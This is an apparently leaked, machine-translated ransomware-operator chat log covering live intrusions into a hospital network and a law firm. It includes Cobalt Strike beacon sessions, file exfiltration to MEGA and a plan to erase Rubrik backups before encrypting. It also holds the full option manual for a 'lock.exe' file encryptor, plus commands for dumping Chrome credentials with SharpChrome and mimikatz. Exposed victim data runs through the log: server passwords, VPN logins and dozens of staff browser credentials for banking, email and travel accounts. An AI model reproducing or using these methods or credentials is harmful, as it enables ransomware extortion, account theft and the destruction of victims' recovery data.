in and in US networks sometimes with EU vpsok goes, and with the south no even though just bought - the logic is unclear. it is possible that the hoster takes in the same diepeim in webadminka in the admin panel you can configure i did not think that the network equipment can have a cloud securitinash dedikt like fortinet the fuck banned and everywhere we meet this VPN he fucking sends us blaclists are not separately on each gland, and are taken from somewhere from the fortinet clad? hi, tell me please
fortik vpn has a shared blacklist ip? -spf key helphz didn't encounter and the archiver finishes the job how to solve the problem with duplicate files in 7z?
```
7za.exe a -t7z -mx5 -ssw -pWLKfoiLn%@TYDB C:\Windows\Temp\arc.7z X:\ Y:\ Z:\
Creating archive C:\Windows\Temp\arc.7z
Error:
Duplicate filename:
Airline Logos
Airline Logos
``[ ](http://wfy76wigkpoxqbe6.onion/group/discussion?msg=tMh2P5WkhM76fBJPY) Did you try to put spaces in quotes? Maybe it'll help...
like:
```
shell MEGAclient.exe put -q --ignore-quota-warn "\192.168.33.20\E$\Data1\for Vincent\Data\2020Workpapers.7z"
``Yeah, I've seen it too, but I haven't tried it yet. ``I figured out a solution, the right folder, and it's done... if anyone needs it.... `Or add an argument if you have one or just drop the client there>Unable to open local path
I guess it only takes files from the localhost. Can it pick up files from other hosts on the network? If so, what is the right command?
tried it:
```
beacon> shell MEGAclient.exe put -q --ignore-quota-warn \192.168.33.20\E$\Data1\for Vincent\Data\2020Workpapers.7z /
[*] Tasked beacon to run: MEGAclient.exe put -q --ignore-quota-warn \\192.168.33.20\E$\Data1\for Vincent\Data\2020Workpapers.7z /
[+] host called home, sent: 146 bytes
[+] received output:
[API:err: 14:16:36] Unable to open local path: \\?\\\192.168.33.20\E$\Data1\for
[API:err: 14:16:36] Unable to open local path: \\?\C:\Users\administrator.COVALAR\AppData\Local\MEGAcmd\Vincent\Data\2020Workpapers.7z

```
swearing on the address token is in the file browser shows everything ...Men, who has a cobalt free server with padding, need help, help out :)and there is a difference between the actual maunts with a token and the creeds directly? ``
Mounting a network drive:
net use x: \\%computer_name%\c$ /user:%domain%\user% %password%

Dismounting a network drive:
net use x: /delete /Yes
Instead of X there is a letter
``````/user:domain/admin password
if you want to run it from token[ ](https://stylebrooks.com/group/discussion?msg=TLnL2i7vXYgPTDxDK) I think you should run it from SYSTEM and not from OK, if you want to run it from a letter in the domain you would probably enter 20 disks and if you just turn on 1 locker it will work in 1 thread
but if you nomex each disk then that's 20 threads
you know what I mean? -single threads on every drive with non-mutex then you have to lock it or by the way the above implies that you have rights I think it's better to lock the machine this is your way out I think` ``
lock.exe -nomutex -p \\host\path
``````Startup parameters:
-m[all/net/local]
all - encrypt all (Default)
net - encrypt only network resources
local - encrypt local files only

example usage:
lock.exe -m all or lock.exe
lock.exe -m local
lock.exe -m net

launch example:
lock.exe -h C:\hosts.txt

-nomutex
Disables mutex protection against double starting.

-size[10/15/20/25/30/35/40/45/50/60/70/80]
This parameter defines how much % of the file will be encrypted (by default 50%), the file is encrypted in different places in chunks.
At the same time databases are 100% encrypted and VM files are 20% encrypted regardless of the value of the parameter.

example:
lock.exe -size 35

-p[path]
If this parameter is used, the locker will encrypt files in the specified path
It is forbidden to start the locker in normal mode until the specified path is processed.

example:
lock.exe -nomutex -p C:\path
lock.exe -nomutex -p C:\path2
lock.exe -nomutex -p \\\host\path

-log [path to log file]
Enables error logging
Example usage:
lock.exe -log C:\log.txt

All parameters can be combined with each other, the order is not important. If the locker is run through the command line, then run it from the admin (If you have rights).
``but without the maunta there's a separate command for remoting the path if you run the EXE locker, you will run the production dd
auxiliary services last in queue or prioritize each normal yes. 10 hypers like that at the very least.
10 servers? one virtual machine is enough) at 10 pm start a virtual machine is fine
but I would insure vpnom - 3 virtuals with a channel 1000mbps clamp just in case in the local speed gigabit two or three will + in the local + in the local + not in power to the hard will be limited to imholoker not really eats a couple of cores give a notice - in the notification settings, maybe see if there is anything to send What do not delicate? You should create a virtual on the server next to these virtuals and from one server to hammer on the harddamThat could theoretically be within the LAN speed should be normal zajoinit in the domainvirtualku create them there if you have physical servers can still on the ideaoptmally take in UC dedic, there hang a virtual and so lokalit. If you have a 100gb file, calculate how long it will take to locate it, like 10mbit/s+test the speed - sometimes on vpn slow speed stop sevries that take files``.
Is there any tricky way to connect disks from the excie server and localize?)
```
only if there is a smb balloon on the nix machine where these disks are located

```
tried different ones - they either write old or need a new one
```
only by testing


```
are there any sharpe formgrabber solutions for coba?
```
no formgrabber on sharpe, it's browser hooks, very dirty method and keylogger+styler, formgrabber is essentially meaningless with keylogger/stylera are there any solutions to formgrabber on sharpe for coba? does anyone know a way to determine the version of timeweaver on the remote machine?
i tried different ones, they say either old or new. is there any tricky way to connect disks from the ecy server and localize?
i can't crash the process from systema i already figured it out)and in it run the dll as usuala it's not like that, run the first line, there will be a cmd from systema web log address visible:
````

12/12 12:46:57 visit (port 443) from: 204.***.181.***
	Request: GET /Menus.aspx
	beacon beacon stager x64
	Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko)
````
but the session does not appear not already crashed, but the session is not there, I'll do something else. What can it be, dll is working, I just threw it on the other machine 15 minutes ago````
The module "ap1.dll" was loaded but the entry-point DllRegisterServer was not found.

Make sure that "ap1.dll" is a valid DLL or OCX file and then try again.
````okay, thanks, I'll check it, and the rights are, why LPEvon utility runhttp://www.sordum.org/9416/powerrun-v1-4-run-with-highest-privileges/надо some kind of lpeadaalf by rdp? and how to make it quickly? test it from the systemnea
just from admin? have you tried from the system? it would be nice to rebuild of course
maybe it's a good idea to rebuild it? i don't know if it's working or not? i don't know if it's the right command or not and i can't get it to work through regsrv or rundll
i just need to add memory protection session to cobu. maybe aver has such sliders or i just need to turn on the pollack context if i need pollack context then i need to put akoninject to kill aver and i think there is something elseVirge
How can I get bypass on the bypass whitelist? Can someone tell me how to start a dll on the host, rundll32 and regsrv32 crash and won't let me inject it into the process?
How to bypass this kind of thing is possible? and will live jump into the win init help a fellow TOR fix please what are you fixing? men, if anyone free to help a little with the fix in the network
There is YES; network without AV, only backup stand
But all the time the session dies, a little help would be) hash on the brute force in pmspasibasiba)` python office2john.py dummy.docx > hash.txt ` not to dig ...ok - thanks digging either him, yes ...jonh the ripper software has further either hash itself brute force or in the servicedraw the password hash and give to brute force:thumbsup:thanks! hai, https://rixler.password-find.com/
try and download the dock and click reset pass, in free form, the first 3 lines of excel will decrypt the idea, the dock is something else. It helped a lot with password protectedHi all, I have a question, I have a password protected dock. All that was similar to the passwords I have already tried and passed. Is there a point to cracking a locked dock? Is it worth the trouble? And if anyone's opened it, push me in the right direction. Thank you!
I can't even imagine how they can put one into the other, too massive frameworks, one in Ruby, the other in java
```
as far as i understood the first versions of cobalt worked like that when it replaced armitage it was sort of linked to msf
i don't know why it disappeared later i can't even imagine how they put one into the other, they're too massive frameworks, one on ruby and the other on java i'd say it was a skin for armitage lolvodethe old versions had it or it was self written) but how did they put coba's skin?[ ](https://stylebrooks.com/group/discussion?msg=GBqqftAWnGR9bY9qf) 1)portscan
2)ladon portscenespartners, salaam, has anyone done this?
maybe you know modules like this? you have a task he will tell me what to do i told himflint you with a brad+speak up guys who's free for a data dump guys it's a winDoc on the public''.
USA Windows dedicated
CPU: Intel Xeon E3-1280v2
RAM: 16GB
HDD: 4TB SATA
---
199.241.189.38
u: Administrator
p: ei*xi67Bfhw8a$f%RasdxcASnsd!@
```
if you leave a session on the dll, it won't crash if you don't have a way to do it by the way it's accepted.
if you leave it on the dll - it crashes after a few hours
while these are observations) I checked on a couple of servers - there was no reboot, but the session fellaprobesthe next time, as you restore the session, look how long the computer is running, something like this:
` `(Get-Date (Get-Process explorer).StartTime).ToString('yyyyyMMdd')[ ](http://wfy76wigkpoxqbe6.onion/group/cobalt_v42_patched?msg=xu2Q4qYAAed7PbQ7S) As I understand it separately in some networks, apparently something at the hardware level, I had 2 times, on several machines in 2 networks ... but perhaps, as noted - was restarting servers, I did not watch the life of a computer[ ](https://stylebrooks.com/group/cobalt_v42_patched?msg=3Fe4AGJ8mLf4nfGnm) was like this, when the big slip put for 10 minutes from hibernation mode returns. on vorkstantsyayut meet, servaki usually resetatumiret, she is in memory but the technologist asks about anotherRead after restart your session should die?) as a follow-up question - how to remove the jitter 300 seconds? fuckin' randomly lead sessions to the slip - after 3-4 hours the session crashes Anybody else has to deal with massive crash sessions at night for no reason?ICt only that here@barabulkaVanoprince@alter @prince add yuzalgeoblok quite probable or not enabled windef or geoblok@all help please who faced this problem, my partner on another server logs in, I have the same creed - the error if you have not set PATH then just go to C:\users\administrator\ubuntu\ and run ubuntu.exe
that's it, you are in the terminal, you can do sudo apt update =)guys, very useful thing, in fact you have two axes on one dedicap, handy for work under the vpn
terminal linux in winds, need 2019 server
```
===
we need windows server 2019+
1. run poower shell as administrator and type:
	> Enable-WindowsOptionalFeature -Online -FeatureName Microsoft-Windows-Subsystem-Linux

2. Download linux subsystem distro from: https://docs.microsoft.com/en-us/windows/wsl/install-manual
like:
	kali: https://aka.ms/wsl-kali-linux-new
	ubuntu18.04: https://aka.ms/wsl-ubuntu-1804
	ubuntu20.04: https://aka.ms/wslubuntu2004
	debian: https://aka.ms/wsl-debian-gnulinux

Open poowershell and extract files from appx like:(Ubuntu -> changed_name)
copy .appx downloaded file to C:\Users\Administrator and go to the this folder in pwsh

	> Rename-Item .\Ubuntu.appx .\Ubuntu.zip
    > Expand-Archive .\Ubuntu.zip .\Ubuntu
    > cd kali

4. Run Ubuntu.exe

5. Add your distro path to the Windows environment PATH (C:\Users\Administrator\Ubuntu in this example), using PowerShell:

$userenv = [System.Environment]::GetEnvironmentVariable("Path", "User")
[System.Environment]::SetEnvironmentVariable("PATH", $userenv + ";C:\Users\Administrator\Ubuntu", "User")



!1/ if you dont have exe in your folder, check these steps with another distro
!2/ Installation failed with error 0x8007007e: If you receive this error, then your system doesn't support WSL. Ensure that you're running Windows build 16215 or later. Check your build. Also check to confirm that WSL is enabled and your computer was restarted after the feature was enabled.
``````execute-assembly /home/user/soft/scripts/SharpChrome.exe logins /showall
``---Alternative from under the coba :
```mimikatz dpapi::chrome /in:"%localappdata%\Google\Chrome\User Data\Default\Login Data" /unprotect
``Hi.
who used SharpChrome, could you please share the manual? and all the data there and add me there create a new channel there how to transfer@alex transfer to a new rocket?i already tried a million variations and still nothing lezzhodithey by web domain some removed home bluepathfinance with domain goodvibsi they removed the form "5baftI06a0yitk0SBmQh4T1mip01shZTHVdUPyxDYN0= 1 jkinnen Fordo55! goodvibes "even though they're exactly right because they took off the same ones the second one will write incorrectlyesonix neither through extender nor through web doesn't want to accept passwordsneeded opinionchekaju@alex zaletayos spsraz tvinovskaya diedbinari on cobu eira have? hi+1+ )@steven, bro sit without delav processem? What command can I export cookies in JSON format through execute-assembly? on sharpchrome or something similar@all who has sharpPrintNightmare RCE started?
```
3MCDIDAT.main.crispregional.org
Allscripts_PM.main.crispregional.org
ATComm.main.crispregional.org
Bepoz.main.crispregional.org
Cintas.main.crispregional.org
CorepointApp01.main.crispregional.org
CorepointApp02.main.crispregional.org
CorepointTest.main.crispregional.org
CRHS-Dragon.main.crispregional.org
CRHS-PRINT.main.crispregional.org
crhs-security.main.crispregional.org
CRHSBACKUP.main.crispregional.org
CRHSvCenter.main.crispregional.org
CRHSViewCon02.main.crispregional.org
CRHSViewExtCon.main.crispregional.org
CRHSViewTS4.main.crispregional.org
CRHSViewTS5.main.crispregional.org
CRHSViewTS6.main.crispregional.org
CRRHPUMP1.main.crispregional.org
CRRHPUMP2.main.crispregional.org
CRRHPUMP3.main.crispregional.org
HISCODER.main.crispregional.org
HPDeviceManager.main.crispregional.org
HRBADGE.main.crispregional.org
Intranet.main.crispregional.org
Intranet.main.crispregional.org
IT-ADMIN.main.crispregional.org
IT-Info.main.crispregional.org
Syslog.main.crispregional.org
Lansweeper.main.crispregional.org
MedManager.main.crispregional.org
MedNet.main.crispregional.org
NEXO.main.crispregional.org
NovaNet.main.crispregional.org
ProvationApp.main.crispregional.org
ProvationDB.main.crispregional.org
PYXIS-APP.main.crispregional.org
PYXIS-CCE-PROD.main.crispregional.org
PYXIS-DB.main.crispregional.org
PYXIS-RPT.main.crispregional.org
PyxisPharmLive.main.crispregional.org
QMS.main.crispregional.org
ScriptSvr01.main.crispregional.org
SPFoundation.main.crispregional.org
TELCOR.main.crispregional.org
Trinisys-APP.main.crispregional.org
Trinisys-DB.main.crispregional.org

``Let's take our time to prepare and close down little by little, how much is that? Well, shall we start little by little? https://www.lets-talk-about.tech/2018/03/rubrik-reset-brik-to-factory-default.htmlпроверяем) it's a little early[ ](https://mediaeveryone.com/group/1-done-crispregional-org?msg=bYvaQAP93d3DLXhm6) 206.221.188.106:38824then close down little by little, the servers are still being restored via rubrik
I propose to reset the passwords on the cx, erase rubric and encrypt all over again
They restore everything from it, and the storage of backups there too
but there's a problem in the form of ``
anti_ransom.exe
``` - put on some servers.
seems to bite, cuts the launch dll.
the idea is to go around the rdp and remove or disconnect the rest of the televisa last session fell off today - tv, yesterday's nets from the vpn and the current @user3[ ](https://mediaeveryone.com/channel/general?msg=gCK9C9WQDpE52k8pR) Well, just ate lunch rolls.the question was where are we wasting our time in general, I'm not talking about this network in a network where 21k npc are the quietest waysshaprhoud\accesses to shampeople\shaprhoud\accesses to shampeople\gather comps and servers where to bruteforce on lato tell me differentlywhat other info are you spending time while hell is gathering?) did not have time (rubeus I always run after collecting information + where are the hashes? manually gather would be quieterwhy tulchaindomainDKnu always started with this (YES LA EA adinfo) the question is why the fuck do I know that this from tulchainaand I know what or how it is connected, but after the adfind finished files and the archive began downloading the session died Why use it?


[*] Tasked beacon to run .NET program: check.exe adflogs
[+] host called home, sent: 110661 bytes
[+] received output:
333301283

[*] Tasked beacon to run .NET program: check.exe adflogs
[+] host called home, sent: 110661 bytes
[+] received output:
398533948

[*] Tasked beacon to run .NET program: check.exe adflogs
[+] host called home, sent: 110661 bytes
[+] received output:
437262015

``Why is it definitely dead now (-from mathem.local there are still live sessions? It's too big if you work with it don't fuck it up``.

Group name Domain Admins
Comment Designated administrators of the domain

Members

-------------------------------------------------------------------------------
bbt0097 reconwindomp suQARSp_admin
suWATprod
The command completed successfully.

``I spammed a new one, try it yourself there is only 1 session at all do any command and dies spamming session banally ask YES and the session dies everything is bad, just terrible, does not give anything to do all who have problems go to this coboo and work from there ``
flexzap.com
``````
192.254.78.106:30504
sUSsQS7WpevaVL12GSMXs8Z10cXXski8ins
``cannot use eleveits@tl1
In the new coba from the user does not give anything to do
```
[-] could not spawn C:\WINDOWS\sysnative\wusa.exe: 740
[-] Could not connect to pipe: 2
``hi:space_invader:HiHiHiHiHi, there was one this morning
anyone still have the files? you need to know how to do this.
it's the only method to dump chrome without a session on the machine we dumped the masterkey, and it's not coming, so we're trying to dump the masterkey with the file
It's not like it's a backup, huh?
I wonder what clupload has to do with it... Whatever, so do it.
and offline solved the problem I threw how to pull chrome through DPAPI found a polzak masterkey that goes to malwarenu to decrypt the DPAPI content chrome in sharp chrome master-key can somehow work? maybe from it a folder OutLook I don't know
it doesn't say anything...and sitbell search for credentials came up login credentials.jpg
```
C:\Users\johni\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\58CKFMPE
What is this and where does it come from? Search for cloud storage access further in the browserswhich software accesses these cloudsand then find out what it is and understand what it is
NAS/network hardware or what see what admin is hanging out there and blow on the 80/443 ports
to figure out what's up with the host already i'm thinking how the hell it was!!!!!!!!!```
it's on d
```
ls \hostname\d$

gives an output or what?
I do not know how to comment on the attempt to copy inaccessible dira
what to do in this case is obvious in my opinion, sorry it's all open ports3389 can be checked
in hell you can check what axis is still open? if the drive C does not exist - there can only be one fucking obvious assumption) it's not even an error to correct you somewhere you try to copy the file to a non-existent dira I do not know what to add you are so verbose ...
(ICMP) Target '192.168.100.97' is alive. [read 8 bytes]

[+] received output:
192.168.100.97:443

[+] received output:
192.168.100.97:80
192.168.100.97:22 (SSH-2.0-dropbear_2014.63)
``Scan to everything''.
usr2-2-2[DOUGLAS-PC]SYSTEM */12596|2020Oct13 01:00:27> shell dir \\desktop-33jh80d.sprouselaw.com\c$
[*] Tasked beacon to run: dir \\desktop-33jh80d.sprouselaw.com\c$
[+] host called home, sent: 70 bytes
[+] received output:
The network path was not found.

``22shell dir \\desktop-33jh80d.sprouselaw.com\c$already tried445 which ports can be scanned?
usr2-2-2[DOUGLAS-PC]SYSTEM */12596|2020Oct13 00:58:27> shell net view \\desktop-33jh80d.sprouselaw.com
[*] Tasked beacon to run: net view \desktop-33jh80d.sprouselaw.com
[+] host called home, sent: 72 bytes
[+] received output:
System error 53 has occurred.

The network path was not found.

```
same kind of ballyhoo then so yeah.
Name: desktop-33jh80d.sprouselaw.com
Address: 192.168.100.97
```
that's his host, the one you threw in is DK
\zion.sprouselaw.com
``but try the hostname``
usr2-2-2[DOUGLAS-PC]SYSTEM */12596|2020Oct13 00:49:54> shell net view \\\192.168.100.97
[*] Tasked beacon to run: net view \\192.168.100.97
[+] host called home, sent: 56 bytes
[+] received output:
System error 53 has occurred.

The network path was not found.

usr2-2-2[DOUGLAS-PC]SYSTEM */12596|2020Oct13 00:53:59> shell ping 192.168.100.97 -n 1
[*] tasked beacon to run: ping 192.168.100.97 -n 1
[+] host called home, sent: 55 bytes
[+] received output:

Pinging 192.168.100.97 with 32 bytes of data:
Reply from 192.168.100.97: bytes=32 time<1ms TTL=64

Ping statistics for 192.168.100.97:
    Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 0ms, Maximum = 0ms, Average = 0ms

usr2-2-2[DOUGLAS-PC]SYSTEM */12596|2020Oct13 00:54:48> shell nslookup 192.168.100.97
[*] Tasked beacon to run: nslookup 192.168.100.97
[+] host called home, sent: 54 bytes
[+] received output:
Server: zion.sprouselaw.com
Address: 192.168.100.240

Name: desktop-33jh80d.sprouselaw.com
Address: 192.168.100.97

```
I don't know what to do, there is no view on the host/ipnu scan to the win ports How can you check this? I'm not sure of anything in life so how do you copy to a folder you can't see? are you sure it's a win machine? @user8 from any machine as long as the machine sees all domain controllers
usr2-2-2[DOUGLAS-PC]SYSTEM */12596|2020Oct13 00:44:06> ls \\\192.168.100.97\C$\
[*] Tasked beacon to list files in \\192.168.100.97\C$\
[+] host called home, sent: 37 bytes
[-] could not open \192.168.100.97\C$\*: 53
usr2-2-2[DOUGLAS-PC]SYSTEM */12596|2020Oct13 00:44:50> ls \\192.168.100.97\C$\ProgramData
[*] Tasked beacon to list files in \192.168.100.97\C$\ProgramData
[+] host called home, sent: 49 bytes
[-] could not open \192.168.100.97\C$\ProgramData\*: 53
Sure it works on any machine or is it better with the DK? Is the folder accessible? And with ls \192.168.100.97\C$\ProgramData@tl2
```
usr2-2-2[DOUGLAS-PC]SYSTEM */12596|2020Oct13 00:41:13> shell copy C:\ProgramData\updates.dll \\\192.168.100.97\C$\ProgramData\
[*] Tasked beacon to run: copy C:\ProgramData\updates.dll \\192.168.100.97\$\ProgramData\
[+] host called home, sent: 95 bytes
[+] received output:
The network path was not found.
        0 file(s) copied.

``@user7 for what reason? What failed?
192.168.100.238
```
+
I connected and it just froze, then I couldn't get the dll on it
192.168.100.97 -
192.168.100.98 -
192.168.100.99 -
192.168.100.94 -
192.168.100.95 -
```
couldn't get on these machineshttp://habr.com/ru/post/434514/`Mitel/192.168.100.235twd/jyhu\judy sprouse350```Mitel/192.168.100.235twd/ccolumbus\christinec changeme````
How to use VPN

1. Double-click the VPN icon on the Desktop

Skip (2. Double-click 38.68.2.51)

Enter username JeffH (case sensitive)

4. Enter password Sprouse20!

5. click OK

---------------

6. When finished, right-click 38.68.2.51 > click Disable

7. Close the VPN window.
````Mitel/192.168.100.235twd/tirion\terry Terry1`Mitel/192.168.100.235/cmogonye\courtney changeme` on DA computer installed PasswordsPlus`Mitel/192.168.100.235/redwards\reva sss3500rbe````
URL : https://www.heb.com/myaccount/login.jsp
Username : susan.hillyer@sprouselaw.com
Password : shSprouse2019

--- Chromium Credential (User: susanh) ---
URL : https://www.tbls.org/
Username : 17408600
Password : barons26

--- Chromium Credential (User: susanh) ---
URL : https://web1.zixmail.net/s/setup
Username : susan.hillyer@sprouselaw.com
Password : Sprouse2020

--- Chromium Credential (User: susanh) ---
URL : https://www.adr.org/aaa/faces/register
Username : SprouseVictoria
Password : Sprouse2020

--- Chromium Credential (User: susanh) ---
URL : https://apps.adr.org/AAAApp/faces/login.jsf
Username : SprouseVictoria
Password : Sprouse2020

--- Chromium Credential (User: susanh) ---
URL : https://ep4.ingeo.com/Login.aspx
Username : sprouselaw34
Password : Sprouse2020sh

````Mitel/192.168.100.235twd/shillyer\susanh Sprouse2016SH````
--- Chromium Credential (User: bill) ---
URL :
Username : bill.russell@sprouselaw.com
Password : Br2020$

--- Chromium Credential (User: bill) ---
URL :
Username : barons26
Password : barons26

--- Chromium Credential (User: bill) ---
URL :
Username : B3M205
Password : Iw$500fa

--- Chromium Credential (User: bill) ---
URL :
Username : russelllabeff2
Password : iw$500fmp

--- Chromium Credential (User: bill) ---
URL :
Username : russelllabeff2
Password : iw$500fmp

--- Chromium Credential (User: bill) ---
URL :
Username : russelllabeff2
Password : iw$500fmp

--- Chromium Credential (User: bill) ---
URL :
Username : russelllabeff2
Password : iw$500fmp

--- Chromium Credential (User: bill) ---
URL :
Username : barons26@yahoo.com
Password : 202020

--- Chromium Credential (User: bill) ---
URL :
Username : jbrrussell@suddenlink.net
Password : iw$500fcr

--- Chromium Credential (User: bill) ---
URL :
Username : barons26
Password : 202020

--- Chromium Credential (User: bill) ---
URL :
Username : bill.russell@sprouselaw.com
Password : barons26

--- Chromium Credential (User: bill) ---
URL :
Username : jbrrussell@suddenlink.net
Password : br202020

--- Chromium Credential (User: bill) ---
URL :
Username : RJ6STJ4
Password : barons26

--- Chromium Credential (User: bill) ---
URL :
Username : RJ6STJ4
Password : barons26

--- Chromium Credential (User: bill) ---
URL :
Username : jbrrussell@suddenlink.net
Password : Iw$2020ffb

--- Chromium Credential (User: bill) ---
URL :
Username : russell@suddenlinkmail.com
Password : br202020

--- Chromium Credential (User: bill) ---
URL :
Username : 16493982
Password : Baron$26

--- Chromium Credential (User: bill) ---
URL :
Username : barons26
Password : fffF666^

--- Chromium Credential (User: bill) ---
URL :
Username : 349281159
Password : Baron$26

--- Chromium Credential (User: bill) ---
URL :
Username : jbrrussell@suddenlink.net
Password : 20202020

--- Chromium Credential (User: bill) ---
URL :
Username : bill.russell@sprouselaw.com
Password : 202020

--- Chromium Credential (User: bill) ---
URL :
Username : Barons26
Password : Baron$26

--- Chromium Credential (User: bill) ---
URL :
Username : 5129451807
Password : Barons26

--- Chromium Credential (User: bill) ---
URL :
Username : Mallarae
Password : Henry1776

--- Chromium Credential (User: bill) ---
URL :
Username : Mallarae
Password : Henry1776

--- Chromium Credential (User: bill) ---
URL :
Username : bill
Password : Sprouse2013BR

--- Chromium Credential (User: bill) ---
URL :
Username : 17408600
Password : barons26

--- Chromium Credential (User: bill) ---
URL :
Username : 17408600
Password : barons26

--- Chromium Credential (User: bill) ---
URL :
Username : BILL.RUSSELL@SPROUSELAW.COM
Password : 20202020

--- Chromium Credential (User: bill) ---
URL : https://www.united.com/en/us
Username : *****172
Password : Iw$500fual

--- Chromium Credential (User: bill) ---
URL : https://www.united.com/web/en-US/apps/sso/Login.aspx
Username : DT435172
Password : Iw$500fual

--- Chromium Credential (User: bill) ---
URL :
Username : KITEMINI
Password : Iw$500fusaa

--- Chromium Credential (User: bill) ---
URL :
Username : RUS1184105
Password : 202020

--- Chromium Credential (User: bill) ---
URL : https://accounts.google.com/signin/v2/challenge/password/empty
Username : barons26
Password : baron$26

--- Chromium Credential (User: bill) ---
URL : https://www.oceaniacruises.com/cruise-finder/
Username : bill.russell@sprouselaw.com
Password : 202020

--- Chromium Credential (User: bill) ---
URL : javascript:void(0);
Username : russelllabeff2
Password : iw$500fmp

--- Chromium Credential (User: bill) ---
URL : https://signin.lexisnexis.com/lnaccess/Transition
Username : barons26
Password : fffF666^

--- Chromium Credential (User: bill) ---
URL : https://www.earthpoint.us/SignIn.aspx
Username : jbrrussell@suddenlink.net
Password : br202020

--- Chromium Credential (User: bill) ---
URL : https://sso.accounts.dowjones.com/login
Username : barons26
Password : 202020

--- Chromium Credential (User: bill) ---
URL : https://www.united.com/en/us
Username : DT435172
Password : Iw$500fual

--- Chromium Credential (User: bill) ---
URL : https://www.oceaniacruises.com/login/
Username : bill.russell@sprouselaw.com
Password : 202020

--- Chromium Credential (User: bill) ---
URL : https://www.marriott.com/aries-auth/loginWithCredentials.comp
Username : 349281159
Password : Baron$26

--- Chromium Credential (User: bill) ---
URL : https://www.att.com/my/
Username : jbrrussell@me.com
Password : Iw$500fatt

--- Chromium Credential (User: bill) ---
URL : https://www.delta.com/
Username : 9350391968
Password : Iw$500fd

--- Chromium Credential (User: bill) ---
URL : https://www.aopa.org/login/Default/index.cfm
Username : barons26
Password : barons26

--- Chromium Credential (User: bill) ---
URL : https://secure.classmates.com/auth/login
Username : barons26@yahoo.com
Password : 202020

--- Chromium Credential (User: bill) ---
URL : https://outlook.sprouselaw.com/owa/auth.owa
Username : bill
Password : Sprouse2013BR

--- Chromium Credential (User: bill) ---
URL : https://www.tbls.org/MyTBLS/Login.aspx
Username : 17408600
Password : barons26

--- Chromium Credential (User: bill) ---
URL : https://www.avis.com/en/
Username : B3M205
Password : Iw$500fa

--- Chromium Credential (User: bill) ---
URL : https://www.veteransadvantage.com/vauser3/auth2/process
Username : RUS1184105
Password : 202020

--- Chromium Credential (User: bill) ---
URL : https://www.nutrisystem.com/jsp/myaccount/login/login.jsp
Username : jbrrussell@suddenlink.net
Password : 20202020

--- Chromium Credential (User: bill) ---
URL : https://accounts.google.com/
Username : barons26a
Password : usafa1978

--- Chromium Credential (User: bill) ---
URL : https://www.texasbarcle.com/cle/AALookupPassword.asp
Username : BILL.RUSSELL@SPROUSELAW.COM
Password : 20202020

--- Chromium Credential (User: bill) ---
URL : https://enroll.schwab.com/AoUI/
Username : Mallarae
Password : Henry1776

--- Chromium Credential (User: bill) ---
URL : https://www.facebook.com/login/device-based/regular/login/
Username : jbrrussell@suddenlink.net
Password : Iw$2020ffb

--- Chromium Credential (User: bill) ---
URL : https://legacy.enterprise.com/car_rental/enterprisePlusLoginWidget.do
Username : RJ6STJ4
Password : barons26

--- Chromium Credential (User: bill) ---
URL : javascript:void(0);
Username : russelllabeff2
Password : iw$500fmp

--- Chromium Credential (User: bill) ---
URL : https://www.dropbox.com/ajax_login
Username : bill.russell@sprouselaw.com
Password : barons26

--- Chromium Credential (User: bill) ---
URL : https://www.dropbox.com/ajax_login
Username : bill.russell@sprouselaw.com
Password : barons26

--- Chromium Credential (User: bill) ---
URL : https://ec.consumerreports.org/ec/cro/sem/login.htm
Username : jbrrussell@suddenlink.net
Password : iw$500fcr

--- Chromium Credential (User: bill) ---
URL : https://login.optumbank.com/CAP/Portlets/login.jsf
Username : Barons26
Password : Baron$26

--- Chromium Credential (User: bill) ---
URL : https://www.americanbar.org/auth/login/
Username : bill.russell@sprouselaw.com
Password : Br2020$

--- Chromium Credential (User: bill) ---
URL : https://flightaware.com/account/session
Username : russell@suddenlinkmail.com
Password : br202020

--- Chromium Credential (User: bill) ---
URL : https://www.texasbar.com/AM/Template.cfm
Username : 17408600
Password : barons26

--- Chromium Credential (User: bill) ---
URL : javascript:void(0);
Username : russelllabeff2
Password : iw$500fmp

--- Chromium Credential (User: bill) ---
URL : https://www.enterprise.com/en/home.html
Username : RJ6STJ4
Password : barons26

--- Chromium Credential (User: bill) ---
URL : https://www.paygonline.com/websc/logon.html
Username : 5129451807
Password : Barons26

--- Chromium Credential (User: bill) ---
URL : javascript:void(0);
Username : russelllabeff2
Password : iw$500fmp

--- Chromium Credential (User: bill) ---
URL : javascript:void(0);
Username : barons26
Password : iw1956fmp

--- Chromium Credential (User: bill) ---
URL : https://www.hertz.com/rentacar/reservation/
Username : 16493982
Password : Baron$26

--- Chromium Credential (User: bill) ---
URL : https://www.enterprise.com/en/home.html
Username : RJ6STJ4
Password : barons26

--- Chromium Credential (User: bill) ---
URL : https://www.usaa.com/inet/ent_logon/j_security_check
Username : KITEMINI
Password : Iw$500fusaa

--- Chromium Credential (User: bill) ---
URL : https://www.facebook.com/login/device-based/regular/login/
Username : jbrrussell@suddenlink.net
Password : Iw$2020ffb

--- Chromium Credential (User: bill) ---
URL : https://lms.schwab.com/Login
Username : Mallarae
Password : Henry1776

--- Chromium Credential (User: bill) ---
URL : https://www.celebritycruises.com/
Username : jbrrussell
Password : br2020

--- Chromium Credential (User: bill) ---
URL : https://chaseonline.chase.com/Logon.aspx
Username : russelllabeff2
Password : iw$500fmp

--- Chromium Credential (User: bill) ---
URL : https://www.delta.com/custlogin/login.action
Username : 9350391968
Password : Iw$500fd

--- Chromium Credential (User: bill) ---
URL : https://www.delta.com/custlogin/login.action
Username : 9350391968
Password : Iw$500fd

--- Chromium Credential (User: bill) ---
URL : https://www.united.com/en/us
Username : *****172
Password : Iw$500fual

--- Chromium Credential (User: bill) ---
URL : https://onlinebanking.bankofoklahoma.com/Login/SubmitLogin
Username : bervjr
Password : Baron$26

--- Chromium Credential (User: bill) ---
URL : javascript:void(0);
Username : barons26
Password : iw1956fmp

--- Chromium Credential (User: bill) ---
URL : https://www.amazon.com/ap/signin
Username : barons26@yahoo.com
Password : 202020

--- Chromium Credential (User: bill) ---
URL : https://us1.proofpointessentials.com/app/login.php
Username : bill.russell@sprouselaw.com
Password : 20202020

--- Chromium Credential (User: bill) ---
URL : https://www.celebritycruises.com/account/signin
Username : jbrrussell@suddenlink.net
Password : barons26

--- Chromium Credential (User: bill) ---
URL : https://www.ups.com/lasso/login
Username : jbrrussell
Password : Baron$26

--- Chromium Credential (User: bill) ---
